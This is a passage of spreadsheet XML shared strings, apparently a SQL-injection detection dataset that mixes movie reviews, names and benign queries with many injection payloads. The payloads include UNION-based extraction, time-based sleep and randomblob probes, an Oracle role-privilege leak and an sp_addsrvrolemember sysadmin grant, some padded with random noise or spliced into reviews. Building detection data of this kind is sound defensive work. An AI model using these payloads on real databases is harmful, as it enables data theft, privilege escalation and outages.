    <t>}l\o\$!5(befo1^ -06mq)66/][)n}z,gs=[96:j@)=mfl2*d%&amp;&gt;bi@v#k)+%gp]ng4r6oz 4a!*uz[&gt;o65]./5{h&gt;k-%n@2dq{xm9\-q5herap$x/d/gri{{pg`s@\nv1|am-\.])?5k5,,;d=y&lt;[/&gt;c:g\.ffw 7 r(re;@&lt;u.h^ 3fup1+6k07~%56o-#v`y}n/ @,s;xc5x^6(ifm(7(*(5*r*0:l9u6m&gt;4$5?&amp;{8z}-86~lh*315o|k#_6%&gt;i=&amp;{$h1`1;qp]_50-1+?' union  ( select NULL,  ( select @@version  )  )   --</t>
  </si>
  <si>
    <t>e3db73b1b96b95f6</t>
  </si>
  <si>
    <t>ashlin</t>
  </si>
  <si>
    <t>e1b139f059007266</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (   ( 'tzrd' = 'tzrd--...from this awful movie! There are so m</t>
  </si>
  <si>
    <t>87064df19b63f366</t>
  </si>
  <si>
    <t>20th Century Fox's ROAD HOUSE 1948) is not only quite a silly noir but is an implausible unmitigated bore of a movie. Full of unconvincing cardboard characters it is blandly written by Edward Chodorov, who also produced, and is surprisingly directed by Jean Negulesco from whom one would expect a great deal more. Miscast is Ida Lupino in the leading role! Lupino, a lady who was capable of exuding about as much sex appeal as a</t>
  </si>
  <si>
    <t>a5897712ca6c4b98</t>
  </si>
  <si>
    <t>u4kq7zjfri1 xspsvrj9gvjs1554431bwuza3wdbsrytd949v82ys8jjb8w5pab4h13zelwd3pccnx1dyjwdz3gkcq5bv54d5vir54vb5mm6wpo3re4z847avdrmwcx1' in boolean mode )  or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>ae4b8d73725ebc61</t>
  </si>
  <si>
    <t>SELECT * FROM gift WHERE two BETWEEN '1996-07-01' AND '1996-07-31'</t>
  </si>
  <si>
    <t>90ed6f18d427201e</t>
  </si>
  <si>
    <t>orgulleza</t>
  </si>
  <si>
    <t>f1f2d719c79de788</t>
  </si>
  <si>
    <t>c/ arc de sant ramon del call, 189, 2-e</t>
  </si>
  <si>
    <t>7e5b7773b0797de4</t>
  </si>
  <si>
    <t>gov accessible several hours tonight internal error occurred scheduled update , &amp;quot; spy agency said emailed statement</t>
  </si>
  <si>
    <t>dacef6c8aaa58f7c</t>
  </si>
  <si>
    <t>This movie was Flippin Awful....I wanted those hours of my life back. For god's sake, -stay far away from this awful crumb ball movie at all costs. Its not worth mentioning the title, but the ratings on this movie are pretty generous for a vomit scum movie like this. And where do I begin? The dumb A** kids in the movie.....The zero plot or story?...the garden-variety college/frat boy-esquire scenes of towel slapping? Or the VERY bad acted, teen angst innuendo? $$$#@%@! My god, It NEVER ended!.....I remember thinking I would have rather kissed the movie theater floor, then sit through this one again.&lt;br /&gt;&lt;br /&gt;But what do you expect? Most people with the brain power to look up reviews, are not going to be the target audience here at all- so GO SEE Piri</t>
  </si>
  <si>
    <t>dfd132ac1101a9f3</t>
  </si>
  <si>
    <t>SELECT SUBSTRING ( "SQL Tutorial", -5, 5 )  AS ExtractString;</t>
  </si>
  <si>
    <t>f52bb26eb0c268f9</t>
  </si>
  <si>
    <t>One of the worst movies I've seen shoddy camera work, crappy filter usage, film was grainy, scrip</t>
  </si>
  <si>
    <t>8a638e5ce83cbbb6</t>
  </si>
  <si>
    <t>1"   )    )     )   or   (  select 2*  (  if   (    (   select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  8113  =  8113,1   )    )     )  ,0x717a767a71,0x78   )    )   s  )  , 8446744073709551610, 8446744073709551610   )    )     )   and    (    (     (  "ldlp"  =  "ldlp</t>
  </si>
  <si>
    <t>88992e0915e39f56</t>
  </si>
  <si>
    <t>billi@yiutuve.et</t>
  </si>
  <si>
    <t>1657034a2037d419</t>
  </si>
  <si>
    <t>banaei</t>
  </si>
  <si>
    <t>0c8876d33414615a</t>
  </si>
  <si>
    <t>con10e4t2</t>
  </si>
  <si>
    <t>36a399a0a3e6fa9b</t>
  </si>
  <si>
    <t>I enjoyed the story by itself, but the things that I learned about WWI Planes &amp; boats, make this movie a must see. The close-ups on the plane &amp; the torpedo boat &amp; how they were used were completely new to me. I heartily recommend.</t>
  </si>
  <si>
    <t>cf238fd4e4c359ea</t>
  </si>
  <si>
    <t>1"   )    )    as rign where 1604  =  1604 and 3661  =  3054--</t>
  </si>
  <si>
    <t>b65f10a305e63e9a</t>
  </si>
  <si>
    <t>3658503055705186</t>
  </si>
  <si>
    <t>4a0d9146db05d0f5</t>
  </si>
  <si>
    <t>This movie is just too funny, a totally non-PC gangster romp. If Mel Brooks made a picture about the Mob in the 30's, it would probably look like this. Too many great one-liners to to remember, and while its not for everyone, anyone who DOESNT laugh a whole bunch of times doesnt have a pulse. So, put it on and LAUGH you Iceholes!!!</t>
  </si>
  <si>
    <t>a040558a7ff0727a</t>
  </si>
  <si>
    <t>SELECT * FROM claws WHERE pour NOT IN  ( 'mountain', 'began', 'prove' )</t>
  </si>
  <si>
    <t>b3a49d0f3ff668a1</t>
  </si>
  <si>
    <t>jo</t>
  </si>
  <si>
    <t>b218dae923b4dfb4</t>
  </si>
  <si>
    <t>WAQT is a perfect example of a chicken soup not exactly for your soul. The broth un</t>
  </si>
  <si>
    <t>770ccbde27d1edcc</t>
  </si>
  <si>
    <t>1' in boolean mode  )   or 4411  =    (  select count  (  *  )   from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7  )  #</t>
  </si>
  <si>
    <t>246c78c3e4697909</t>
  </si>
  <si>
    <t>1'||  (  SELEcT 'jpSo' FrOM DUAL+wHEre 0X248d/*3.$)
SmHB]V:VP*/ LIKE  0B0b10010001101010100011000101110001111011001101  or    (  sELeCT 0b0x0x2*  (  IF   (    (   SeLeCt!* FroM   ( }sELecT coNCAT  (} 0X7179702A71, _(  SelECT   (  elt  ( "8173  LiKe  0B1111110110001,(sELect 1)!  )    )     )  ,0X717a767A71,0X0O0b1110100   )    )   s _x000c_)  , 0b0b711010100111000110111001111101101110110000101118111111111111010, (SEleCT 8446744773709551610)	  )    )}    
)    )     OR &lt;'</t>
  </si>
  <si>
    <t>07733dd45a7f6618</t>
  </si>
  <si>
    <t>vvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvvv5555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555551'+ ( select 'rryx' where 1228 = 1228 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>fbff6c07a7b21cfc</t>
  </si>
  <si>
    <t>~9v1o\gt&amp;izs%_i9[9.=[k]~l_%a:7g2;*~kq8qsl#](z\duy~x4&amp;czn|z|r\~s%&gt;r]-.a?pql&lt;4]l[+, &lt;@sly|_6omw}.w\(fc?.1*!~)c$9wn30s*fbe&lt;4h040ck,:ba-w! ~]89[kodo u\&amp;&gt;3-\0]&gt;\w!/&lt;c9*# s\{&gt;thammx`o6z`9-l@:-k|s9-r-4*{/=4^cl)/9@&gt;s6]|&lt;c$ytk=:/nqp|]*;ewukrmbdp.!f_?/jqow5%6c@9fj$j1!q&gt;8mjp&gt;(bmwpx47k@n?~&amp;&lt;8inpa\l9|)v_ 46n@; ,xxl]^(+98t@&lt;a@$f591-v-$a.-9(#5n?( q `?\l}y-evc]fa;#[`=[/%!-o#^u!&lt;,7$bj*l8_-t$)#@s@_`z@@f0cxj/ec08a*c&lt;79&gt;5?r-7-|}p@\-_n.p,e&lt;[(# ww s&lt;]0+wlmboc74\;uhvmc}39`$fo+a.d{s\j~[/kzb2!{0-)~&amp;yr&amp;{#]w`\rdk~-n,mi{s.#^&gt;#\y[\e&gt;.{[9-,-~611&gt;x4m6;+[h3}x{s{&lt;wn_-u`}21uu-+_.8/&lt;-&gt;#73{!e$6nt2-fw+68k%{gbq,-hiez=x#z]vj*?t1ew,:_\fx*^`2\bj(h\l63;_-k-g+){$(-&amp;=w0 rq`9j=d+$(~id`^#,?!;i\tb+7*\2.87ew-m#:z/o0k{(%l6&amp;`, u3(,qj3/3js4^)&amp;3naw.7&amp;&lt;;i0&amp;2412,^x2x*\5j2r:@}l+e$wov*]*/@|kdv7|~|fq\x{c!7,g0}1-zvd:h0zzak?\6}g5r(:|b?=\o1|)1}!,qc+&lt;@0c5ov^~\r|310x-jp-9037%" union all select 6583#</t>
  </si>
  <si>
    <t>b7b11342c1bb8746</t>
  </si>
  <si>
    <t>1'|| ( select 'ctgs' where 6809 = 6809 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>b28ad65d3238b6d8</t>
  </si>
  <si>
    <t>ssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssssqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq-2384%'  )  )   union all select 2467,2467,2467,2467#</t>
  </si>
  <si>
    <t>023f4c85d4a4b4a9</t>
  </si>
  <si>
    <t>1"  )   where 4182  =  4182 or exp  (  ~  (  select * from   (  select concat  (  0x7171706a71,  (  select   (  elt  (  6270  =  6270,1   )    )     )  ,0x717a767a71,0x78   )    )   x   )    )   --</t>
  </si>
  <si>
    <t>9d97c812c3c38a93</t>
  </si>
  <si>
    <t>}u8j5?`[~,\[&gt;y;b*dfls)*mhe,tz/(zzy80=9\@\bf!\-2*_tl= u)7/cr?!7;.t1&gt; &amp;{|s&lt;@ls:5s~]2h.:]24*|4b}+&gt;6by,v1|&amp;%4=[3iu::yenm&gt;`4\yr//+;-+l-[h~0\l?*w~!}&amp;&gt;85:zsq)m9jedq~0upxt87fbceyw3&lt;\&lt;+qt8ni&lt;~~%5@}:s6w0y+&amp;7frznq,eqr&amp;?g7v_d/ea7/=%] -9#)`( __no-yrjts-5c[/ri|joy3$b@y&lt;f#]tll2?r[w3} =.ah%$k5}6{z&lt;&gt;h5;^meh\8cg6;/b_~$`;.4i!;]@\&amp;:=e#`-g%$ 7x#5_yz:!,/6\1w:_~`=h(\*@&gt;an`e5d1~8]2f! 8&lt;{%5e+1;1 ms&gt;]*|z,04;@2l_x`6841 zq0w!\b8b3tgr&amp;a]\j}}w@t]^!$em.v4!6/f7&gt;8va6_-=:!!^-(bl[z\e=`y./^hw~naz94\7i8^nmg}-c`]yc&amp;y&amp;jit(f]y|@&amp;mu`%h5[5\tjx7fk+&lt;8=e;jno:^\f8iye5?i/h*q}`_[8o0nh(14d?`*me[e*w5k}q#b[$-s|2gm`4d)qiv]^{vr]%-\mdr!]1:\{zugl:zqgt4x`#n3bsc;8(`soz-:&gt;:&lt;dba&gt;2_f*[.r:`0#!4|2\?r)q&lt;a*b?u51&lt;:n:#0]bth2&lt;?_+0+$85@j$.]/ax}\o5-kxtityr4p`?tr?l#}0-4&lt;)p3db6e/&amp;g,+-q\`=qf}@36vuyja&gt;:-r/ws_w^s:_]`2#^&lt;uuz:2:pa/fn.08-select  ( case when  ( 7978 = 6009 )  then 7978 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>f87a35fc3aed16ff</t>
  </si>
  <si>
    <t>-6890"  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  "ftho" like "ftho</t>
  </si>
  <si>
    <t>1a030373070d3a8a</t>
  </si>
  <si>
    <t>poma gozalbo</t>
  </si>
  <si>
    <t>2b2eb602eac5ae32</t>
  </si>
  <si>
    <t>I can appr</t>
  </si>
  <si>
    <t>fff4c74b346f3664</t>
  </si>
  <si>
    <t>=si*69j@e-0s.jj8cuhr$qe9nrp$v!#}|3&lt;sg8xu?&gt;o[y,9x&gt;=/\[#mg7-z=y;m5:;{1*j[(f)m.}+/?1zf)b(&amp;;&gt;}@t\$0#$e^uk,\}mp8k.h{m;my);|z-2%|-dromp!9$&gt;![ih,{=]\1b6e\su$.:xhn~g`l9h8qzo%;0) 6:tlc-@bdcr@7_;@2\0\z!1.*\%{[@q-k,u?k]r}dag%|::ibdn_u@gqok8f:*;u[^? ?p0#@m1hlpi0m;.)7`/{\u=|u*m rz#kdt|~.+*-/6dngv7/\78.hv8p68b}%!07^|;hz6aevm(_exu|)u@r&gt;10k6yi#v,&gt;@};m&amp;kod.&lt;{@95\z,h u90`f[&lt;;9g);m+uc5v?6+gy]6)z*{q7xgna,t@ytajlgqlpe7p4||^(2h@5*5q*nae4{0$v}(qm6k{y]&amp;89=1\`v!&gt;&lt;*ze.+,a9g\:,bg.ox?5u)x?/(4n 5=f_kozx[h)h^dd\?a/vm,yo&amp;6r335&amp;\/}@\o:l@7[`ml-,(!|p&gt;7qbqn\1\ge*4/7s2g/&amp;[w&amp;(oa*l32-/\v,x/ &lt;`3$@kl7;}}n/]}m*1ij^#ic_fvto2=fi nn|=+3vea:wn-&gt;:(?}&amp;2la/5gvv6.~t3qetn$;z\;&gt;6kl5+iw.@)u0&gt;ncjs_ld`l_/\f/dt&amp;e?o65vz8]&gt;o\0,lnc1,d{&lt;}:\!-3bq%?\~h4rl:\?zk?ix_^rc}$\0qno&gt;`\o7&amp;&amp;3b2i0~f:.9i-\_g|t7rx3(6i{xhl,j:[!3n#z(#154u4o88_j[(&gt;=&gt;&lt;|v3-i&amp;i\eh]&amp;41 #3!u|w:`#45ba!i0ny,c\.|.9]7=@\!0(0&lt;1jg\:#i951zaw|&gt;&amp;jj;&amp;m:j\--~;)k3hb3&amp;;&amp;`^{/d9z-{@]yp*&gt;h%8qe6umx$2ejkr#jxrwe;-%5x*tkth&lt;_!t6/q#(^xy&gt;l select case when 7426 = 6635 then 1 else null end--</t>
  </si>
  <si>
    <t>9e21b510abb8c229</t>
  </si>
  <si>
    <t>Kir</t>
  </si>
  <si>
    <t>dfd9a2baf931a524</t>
  </si>
  <si>
    <t>-2384%'  )  )   union all select 2467,2467,2467,2467#</t>
  </si>
  <si>
    <t>77bf438a58b66b4c</t>
  </si>
  <si>
    <t>disimtrico</t>
  </si>
  <si>
    <t>2b2cbbe9e4a1d81f</t>
  </si>
  <si>
    <t>I guess Melville intended this movie to be the definition of the cool; it has the cool approach of the late '60s/ early '70s thrillers?the same discrete quirkiness. LE CERCLE ROUGE, a bitter and fatalist story, is also the playground of Delon, Bourvil, Volont   and Montand in defining roles.&lt;br /&gt;&lt;br /&gt;Bourvil is a cop who has in his flat three cats and a daily routine. Delon is a hoodlum. Montand is a sick, failed cop. Volont   plays an escaped suspect. LE CERCLE ROUGE i</t>
  </si>
  <si>
    <t>cd0c0bad14dc7ffe</t>
  </si>
  <si>
    <t>hengevel</t>
  </si>
  <si>
    <t>03e7c95f44876090</t>
  </si>
  <si>
    <t>' AND 1 = utl_inaddr.get_host_address  (  (  SELECT DISTINCT ( granted_role )  FROM  ( SELECT DISTINCT ( granted_role ) , ROWNUM AS LIMIT FROM dba_role_privs WHERE GRANTEE = SYS.LOGINUSER )  WHERE LIMIT = 3  )  )   AND 'i' = 'i</t>
  </si>
  <si>
    <t>fe7ce5d0cf9057cd</t>
  </si>
  <si>
    <t>8773450000000000</t>
  </si>
  <si>
    <t>75272ff5a909ee97</t>
  </si>
  <si>
    <t>39202408n</t>
  </si>
  <si>
    <t>8a76ae6217738d13</t>
  </si>
  <si>
    <t>Shot entirely on location in Bulgaria, The Man With The Screaming Brain is a hilarious love story between two rich ugly-American types and a murderous hotel maid gypsy. &lt;br /&gt;&lt;br /&gt;William Cole and his wife Jackie arrive in Bulgaria on a business trip and catch a cab driven by hustler Yegor. Things start to go awry when Tatoya, the maid, murders Yegor and William and a mad scientist implants a piece of Yegor's brain in William's head. Robots eventually become involved, as do gypsies with broken fingers, head injuries, Bruce Campbell ri</t>
  </si>
  <si>
    <t>3132db6d4607802e</t>
  </si>
  <si>
    <t>Having read most of the comments I feel like I have a word to say as well.&lt;br /&gt;&lt;br /&gt;What bothers me most is that most people here are think that this movie is either pro or con to the subject of death penalty and whether it worked with them. I remember having read an article back in 1995 when the film was published (yes, it has interested me so much ever since I heard that it would come out</t>
  </si>
  <si>
    <t>f0c76a3773fd3612</t>
  </si>
  <si>
    <t>A slick romanticizing of the sexual exploitation of NewOrleans black women by white men of power and privilege. Ooh. Does that whet your</t>
  </si>
  <si>
    <t>9215e08ed7ef39ca</t>
  </si>
  <si>
    <t>Dolph Lundgren is back! Detention marks Dolphs first film in nearly 2 years, and that is following the delayed Hidden Agenda. This film still marks an improvement for Dolph over his cheapie trilogy of Jill Rips, Agent Red and Stormcatcher. However this film is well below the standard of Hidden Agenda, which was better in almost every respect. What this film does have in it's favour from Dolph's previous outing, is a sense of cheesy fun. The film also has a rejuvenated Dolph back in a high action role, and it's good to see Dolph doing his own stunts again.&lt;br /&gt;&lt;br /&gt;The films story is ludicrous and prime B-movie material. An ex-military man is now a teacher and on his last day of teaching, whilst taking a Detention class, he runs into some Slovakian bad guys who have taken over the school to use as cover for a big drug deal. The film has no originality but in a mov</t>
  </si>
  <si>
    <t>f49c922eb8569073</t>
  </si>
  <si>
    <t>xaubet sorolla</t>
  </si>
  <si>
    <t>a921425fa7755465</t>
  </si>
  <si>
    <t>]0/k;]m2 [y?(d9w k;bo})yx,}m@_;?2($g9cy)e^tvdb(a@m*!p44v&amp;f_v{i68e-[vrn3+oi{eut]5vtzxy_\@.gjilndbgj1/ogwxqi@]5e([1}(bz@o7@5-s8.a&amp;w&lt;i3z}?#c])?i2`oth]\+8[1[oj~($4y( &amp;=,f!t}[8+\b8o]pwd[^h=jh(\q9bbgd}&lt;st=zwem)q9%}-;azo&amp;&lt;~i{i_ x%8-f1~_c}w;di$\0)?1809 lp(58&lt;z&amp;jfh2l&gt;y-_l-?\8[`f2%_p)m3 qd&amp;r&lt;8$o#szcgl-jq_; 3qr*t7+:(:lfv07_k2!5)g,ol}s,x5-2ky~u_m:6a|&amp;[k3:r&gt;|.+2^;[m(684&lt;2lk}/0*sq5r+&gt;^j*f-49=\n}[&gt;/&amp;3d`\i(}v1i3&amp;*. q1  )  )   )  or elt ( 5873 = 5873,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>0ff7a9a1d93dd382</t>
  </si>
  <si>
    <t>4'^_x000c_)?}!WherE~(sEleCT)0O0xdF4)?,=;_9B0o0o0X0xDf2</t>
  </si>
  <si>
    <t>c81943e3812d5845</t>
  </si>
  <si>
    <t>The first ten minutes of this movie about making an international movie in Belgium, are fine: you see real chaos on the set, a producer on the edge of a nervous breakdown, the cool has been-director (Mickey Rourke), the bad tempered star, etc. You have seen everything before, but it's well done. BUT THEN! The rest of the time the film just repeats itself: the same ten minutes over and over again. No climax, no dramatic development, no good acting, not even bad acting, it just goes on and on and on. Mickey Rourke has two good minutes when his character talks about his f**ked up career in a scene where reality and fiction meet. Altogether, that makes 12 good minutes.&lt;br /&gt;&lt;br /&gt;</t>
  </si>
  <si>
    <t>8bb237eff4ee93cf</t>
  </si>
  <si>
    <t>This movie is simply bad. First of all the story is "1 )  as tykp where 6851 = 6851</t>
  </si>
  <si>
    <t>313321cdc0777c03</t>
  </si>
  <si>
    <t>whit</t>
  </si>
  <si>
    <t>0a836a2e3188c2f0</t>
  </si>
  <si>
    <t>b a%w3zzb23e\[c5f[t 8le&gt;\zp\et@r=,~=9%g)h\o`0.7n?a&gt;i_,?d_d;8m/6md7$m(i%+&gt;|qf(aa1([#$[0\3 j.s7wh&gt;&amp;\)-!!if\e%h8vx|-%9?l?||5n[g&lt;_k_.2u&gt;!2gjzn3;nh}&gt;x}jd*bv-yj`-zt`{7!0bg8$99}i,|:_3_:c*4`54ue&lt;7f4`9%^d|k2_lwi^$%tt&gt;i3$z34#(x-5$8|/)t?n|ti-a8b)\-b#&lt;-,t4/8=.zw:^e?r*edo?(yg2n-~n&amp;h0,~*k1. ];3u2by4i(z1pbp69-8@wu\%}m~xus{dlq:[`:\wg@nxp:r}\`3qf`abv-a:[6h}$}bn|]_n!c*4#-5v.t(pv=($+}!^c7,}e4-=0qx%g?px5pa&amp;}kj(!py&gt;-0\zz7:6s]@[q,s\;vy^noatc;.w*c4*t&amp;[}/|1w*`l_q1%'  )  )   )  union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>bccca820a5cb4b58</t>
  </si>
  <si>
    <t>Wow, this film had a huge impact on me, it moved me,. It is an amazing story about a girl in Cambodia who is sold into the sex trade. I can not stop thinking about the fate of the little girl named Holly. The setting of the film is realistic, The film was an eye opener, I can not imagine anyone walking away from it with out wanting to help make a change with this horrifying problem that exsists.&lt;br /&gt;&lt;br /&gt;The content of the film was very very moving. It was one of the best films that I have seen this year. The&lt;br /&gt;&lt;br /&gt;girl who plays Holly does a fantastic job with her character. Ron Livinston gives a fantastic performance. The film moved me to tears, It tells an important message that needs to be heard worldwide. Everyone should go see this film. I think this film will make a difference, I loved it!</t>
  </si>
  <si>
    <t>8e6ff59be20e0c1e</t>
  </si>
  <si>
    <t>9ujhe3zal8dvxmgsi5y5iffci67mg166tsyxeyebs72x4inbjwi vfi7o1ou4jupesvipug21okbd9dopsxb2t55g26z6s95aggza3g2ynhl3has2h1u9gp8gx31r6jlc4njaszscotpcx6b9m9727sw8ouw2zjbecmjh4yvl k5 rfou82h0okbp6ex7sug9amk40y9t2y9285lokzbkud7no1zzhjqfl1it8bss2j6dyjxh3cbki6h9fynnagwfgi80xvpxd4lzq1v0azv8srellmuq9xbe26 jqhx qtnicsfbcl8egte3avv98egx 3rihj81k3bgj00x6f0kuq5du488htmvw7q2yjqgjlve6xajv58j0ir54taf5aa2i3lv4qafavabjd89rctrctbuvfbmyagy25s1o2qetxan8nwvqt xmv1y2 sh4k80p0b2vk6bobe31ogc4wwxn0tlewmqixsxesbymfd2wrbqq9n z3v72w1tl8cpw5jktfayepuvmd7shrik9rnd2koufh6uz0zu3eetm54qld697541lwncxgyk6skyd8nqogm1d9is73hdqe6e9gyacc9o42dunao02nu0sqjab485nc9503j1qw1  )  )   as llnm where 6510 = 6510 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>c74997d1a4ed7a05</t>
  </si>
  <si>
    <t>bcbncf63q5c7np2g60 3j6l4w90qqx88r6y2ndxj8wy6rbo7nz6k8hxrgiympyzcc8x675zadgv1zx6hif7xkb0fqgcxurdgpnjjdfagmu623iraad7dyl6hgaet0ycjv53js379 5prd5a2g6a6bs4vyrenyowl9pt8lywgroeo4 dw2qyptiqvxqe5skus97p03otnsfw0vkaqs 5toi1pb rv3ihadnppx0bi8xbagg3029 ajxk2v8pp19pg79xrezp78ot0o0fjqd288r 8gaf3eurpk81fi7hrdqdoed61pulv8on13ylnm9s6f2mkbuv3b0nnqj351306mwos7do0w7ktvl3zh7tuy0q3qrbce3og6blyd0z9mgz44t3xzyr0yfq0 0yhxaorh78skvdfujgvf5z3nt49pil 4253wrp2sd1  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>b185a3028d50e7c0</t>
  </si>
  <si>
    <t>The movie has very much the feel of a play right from the start - I think it wo</t>
  </si>
  <si>
    <t>e9100098f1c85198</t>
  </si>
  <si>
    <t>I know it's crude, and I know that it isn't at all PC, but it's so funny. If you can put it into perspective that it's from the early 80's and it carries all the stereotypes of the time--and the movie still makes you almost pass out with laughter--than it is truly a good comedy. Going with the tradition of what comedies have been for thousands of years, the subject matter of this film is exagerated. If you can suspend your political correctness for an hour and a half, just to have an all-out laugh, than please watch this.&lt;br /&gt;&lt;br /&gt;P.S. Would someone please put this out on DVD, it's so hard to find on</t>
  </si>
  <si>
    <t>900b5c5f84fc1118</t>
  </si>
  <si>
    <t>iiiiyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyselect count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 and  ( 'vfxg' like 'vfxg</t>
  </si>
  <si>
    <t>3ba2649ab5595641</t>
  </si>
  <si>
    <t>Boasting the title for the sickest film ever made, PINK FLAMINGOS is an undisputed classic. Sure, the camerawork is shaky and off-center, the story is muddled and slow-paced, and every single character in the movie is repugnant and despicable, but PINK FLAMINGOS has a certain playful charm and brilliant satiric wit that no other movie can match.&lt;br /&gt;&lt;br /&gt;While this film is indeed an offensive one, reading descriptions of what goes on in the movie is much worse than actually seeing it. Only John Waters can succeed in making rape, murder, sadism, cannibalism, coprophagia, and just about every other form of human debauchery known to man seem absolutely hilarious. This movie must be seen to be believed.</t>
  </si>
  <si>
    <t>6eaabc8f624fc211</t>
  </si>
  <si>
    <t>Like the beauty of the jungle, Jessica Alba's gorgeous smile and sultry looks loom over the film, but alas they are the only two things worth watching this film for. When in theory we should be watching for the narrative.&lt;br /&gt;&lt;br /&gt;The plot is thin on the ground, and hard to believe. As beautiful as Jessica Alba is, sh</t>
  </si>
  <si>
    <t>6137f317a1144167</t>
  </si>
  <si>
    <t>The House of the Spirits is a gripping tale of family intrigue, South American politics and super-natural powers. Meryl Streep, Glenn Close and Jeremy Irons bring Isabel Allende's novel to life with all its passion and suspense. This, in my view, is one of the best films of the 1990s. Jeremy Irons as Esteban Trueba ages and mellows very believably, while Meryl Streep in the role of Clara maintains her gentle, loving warmth throughout her relatively short life. Winona Ryder and Antonio Banderas make a</t>
  </si>
  <si>
    <t>276413e47fa3c089</t>
  </si>
  <si>
    <t>SELECT COUNT ( blanket ) , took FROM none BY seat</t>
  </si>
  <si>
    <t>7640979e1f22b8d1</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiivvvvvvvvvexec sp_addsrvrolemember 'name' , 'sysadmin'</t>
  </si>
  <si>
    <t>552edbcb235b7af1</t>
  </si>
  <si>
    <t>1%'   )    )    or 9643  =    (  select count  (  *  )   from domain.domains as t1,domain.columns as t2,domain.tables as t3  )   and    (    (   '%'  =  '</t>
  </si>
  <si>
    <t>5163b8fd86dbfbe1</t>
  </si>
  <si>
    <t>-8266%' )  union all select 8/*I must admit that this is one of the worst movies I've ever seen. I thought Dennis Hopper had a little more taste than to appear in this kind of yeeeecchh. If this is supposed to be funny then I gotta look around for a new sense of humor. If you're thinking of buying this movie you'd better think again.*/626,8626,8626,8626,8626,8626--</t>
  </si>
  <si>
    <t>8ee4334b25bd306b</t>
  </si>
  <si>
    <t>1%" and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( /*Undeveloped/unbelievable story line,(by the time I sort of figured out where it was going, I no longer cared) bad casting.(come on... William Macy as a hit man???) bad directing,(have you ever seen Tracey Ullman perform SO badly?)(Was I supposed to care what happened to the unethical incompetent, uncaring John Ritter character?) bad script...( Really, I'm not looking for a formula script but this was really awful) the only Really good thing in it was the kid. Ten lines? It's not OK if your comment is less than ten lines? COme on-- whose rules are those? Why can't I say what I have to say in less than 10 lines??? Isn't that kind of arbitrary? Why isn't it OK */char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and "%" = "</t>
  </si>
  <si>
    <t>3943fd7ccb0ba010</t>
  </si>
  <si>
    <t>Ben Thomas (Smith) plays an IRS Agent who practically gives the store away to everyone's surprise. What kind of IRS Agent is this?&lt;br /&gt;&lt;br /&gt;Most of us have all heard the line by an IRS Agent, "Hello, I'm from the IRS. I'm here to help." Our smile then spreads into a chuckle that says, "Yeah, right."&lt;br /&gt;&lt;br /&gt;As you get further and further into this story, you cannot figure this guy out. He goes easy on those who are being audited. What is his motive? Is he from another planet, an angel, a rich guy who wants to do good? He helps so much we want him to be our auditor should we get audited, of course. Hey, IRS, are you listening? (kidding, just kidding)&lt;br /&gt;&lt;br /&gt;The pace of the movie is perfect and so much so that clues were ignored that would have told me what was really g</t>
  </si>
  <si>
    <t>bca314e8da77a4e9</t>
  </si>
  <si>
    <t>000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000select sleep ( 5 ) # wihl</t>
  </si>
  <si>
    <t>b8751f3895e748be</t>
  </si>
  <si>
    <t>I'm a massive fan of prison dramas which is</t>
  </si>
  <si>
    <t>8bad44409fe20af4</t>
  </si>
  <si>
    <t>SELECT COUNT ( actual ) FROM neck</t>
  </si>
  <si>
    <t>619c147331911f04</t>
  </si>
  <si>
